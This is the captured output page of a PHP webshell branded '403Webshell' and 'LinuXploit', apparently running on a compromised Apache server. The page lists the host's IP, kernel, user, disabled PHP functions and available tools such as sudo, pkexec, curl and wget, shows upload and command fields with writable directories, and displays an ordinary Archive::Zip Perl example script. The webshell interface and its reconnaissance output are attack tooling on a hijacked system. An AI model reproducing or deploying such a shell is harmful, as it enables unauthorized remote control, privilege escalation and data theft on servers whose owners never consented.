403Webshell
Server IP : 172.67.216.182  /  Your IP : 162.158.170.104
Web Server : Apache
System : Linux krdc-ubuntu-s-2vcpu-4gb-amd-blr1-01.localdomain 5.15.0-142-generic #152-Ubuntu SMP Mon May 19 10:54:31 UTC 2025 x86_64
User : www ( 1000)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/doc/libarchive-zip-perl/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/doc/libarchive-zip-perl/examples/extract.pl
#!/usr/bin/perl -w
# Extracts the named files into 'extractTest' subdir
# usage:
#	perl extract.pl [-j] zipfile.zip filename [...]
# if -j option given, discards paths.
#
# $Revision: 1.5 $
#
use strict;

my $dirName = 'extractTest';

use vars qw( $opt_j );
use Archive::Zip qw(:ERROR_CODES);
use Getopt::Std;

$opt_j = 0;
getopts('j');

if (@ARGV < 2) {
    die <<EOF
	usage: perl extract.pl [-j] zipfile.zip filename [...]
	if -j option given, discards paths.
EOF
}

my $zip     = Archive::Zip->new();
my $zipName = shift(@ARGV);
my $status  = $zip->read($zipName);
die "Read of $zipName failed\n" if $status != AZ_OK;

foreach my $memberName (@ARGV) {
    print "Extracting $memberName\n";
    $status =
        $opt_j
      ? $zip->extractMemberWithoutPaths($memberName)
      : $zip->extractMember($memberName);
    die "Extracting $memberName from $zipName failed\n" if $status != AZ_OK;
}

Youez - 2016 - github.com/yon3zu
LinuXploit